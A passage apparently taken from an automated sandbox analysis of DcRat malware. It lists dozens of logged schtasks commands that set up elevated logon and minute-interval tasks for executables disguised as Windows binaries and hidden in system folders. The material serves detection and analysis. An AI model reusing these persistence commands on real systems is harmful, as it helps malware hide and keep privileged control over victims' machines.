C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5132
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\wscript.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5168
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 5 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5192
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5240
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5252
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5340
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\ComsurrogateServerdll\wscript.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5348
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 6 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5400
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\conhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:5424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\cmd.exe'" /f1⤵
- Process spawned unexpected child process
PID:5464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\ComsurrogateServerdll\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5488
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5496
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5532
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5576
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 10 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /f1⤵
- Process spawned unexpected child process
PID:5680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Windows\AppPatch\cmd.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Videos\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5836
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\audiodg.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\AppPatch\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5936
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 9 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Admin\Videos\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:5952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Videos\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Windows\AppPatch\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:6004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /f1⤵
- DcRat
PID:6108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 13 /tr "'C:\Windows\Fonts\CrackLauncher.exe'" /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\reviewNet.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6132
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 7 /tr "'C:\Users\Public\reviewNet.exe'" /f1⤵PID:5148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\reviewNet.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Windows\Fonts\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5176
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:5316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\Users\Public\reviewNet.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5280
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\reviewNet.exe'" /rl HIGHEST /f1⤵PID:5296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 13 /tr "'C:\Windows\Fonts\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 12 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:3048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 11 /tr "'C:\Users\Public\reviewNet.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 6 /tr "'C:\ComsurrogateServerdll\wscript.exe'" /f1⤵PID:5384
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WmiPrvSE.exe'" /rl HIGHEST /f1⤵PID:4208
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:768
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\ComsurrogateServerdll\conhost.exe'" /f1⤵
- Process spawned unexpected child process
PID:2624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3120
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 6 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\reviewNet.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4076
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:4084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\wscript.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:2728
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 13 /tr "'C:\ComsurrogateServerdll\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3308
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\wscript.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\ComsurrogateServerdll\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:3156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Pictures\CrackLauncher.exe'" /f1⤵PID:5688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Documents\My Pictures\cmd.exe'" /f1⤵PID:5552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5884
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:5912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Pictures\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:5960
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:5972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /f1⤵PID:1804
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Pictures\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Documents\My Pictures\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:6076
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 5 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /f1⤵
- Process spawned unexpected child process
PID:6084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\cmd.exe'" /f1⤵PID:1472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:5224
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\cmd.exe'" /rl HIGHEST /f1⤵PID:5372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\wscript.exe'" /f1⤵PID:5276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 13 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:3408
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\cmd.exe'" /rl HIGHEST /f1⤵PID:5388
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\wscript.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\reviewNet.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 5 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2308
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\reviewNet.exe'" /rl HIGHEST /f1⤵PID:2588
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:3096
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 8 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3136
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\conhost.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:2900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\reviewNet.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:1600
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 8 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:5980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\it-IT\CrackLauncher.exe'" /f1⤵PID:2956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\TableTextService\it-IT\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:2888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 9 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\it-IT\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:6048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\conhost.exe'" /rl HIGHEST /f1⤵PID:5312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\CrackLauncher.exe'" /f1⤵
- DcRat
PID:6100
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\reviewNet.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:3112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:3808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\reviewNet.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:2780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 12 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:3480
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\reviewNet.exe'" /rl HIGHEST /f1⤵PID:3860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Reference Assemblies\Microsoft\conhost.exe'" /f1⤵PID:1368
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 7 /tr "'C:\ComsurrogateServerdll\wscript.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5660
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:3596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Desktop\conhost.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:1288
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:3108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\wscript.exe'" /rl HIGHEST /f1⤵PID:4980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:4464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\conhost.exe'" /rl HIGHEST /f1⤵PID:628
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\ComsurrogateServerdll\wscript.exe'" /rl HIGHEST /f1⤵PID:3008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Reference Assemblies\Microsoft\conhost.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:2112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 6 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /f1⤵PID:764
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /f1⤵PID:4268
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Desktop\conhost.exe'" /rl HIGHEST /f1⤵PID:4380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f1⤵PID:3684
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:1816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f1⤵PID:3360
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\CrackLauncher.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 5 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:2200
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:3084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:3916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 9 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /f1⤵PID:4048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:6176
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Google\Update\Offline\cmd.exe'" /f1⤵PID:6196
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 13 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:6248
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\Offline\cmd.exe'" /rl HIGHEST /f1⤵PID:6312
-
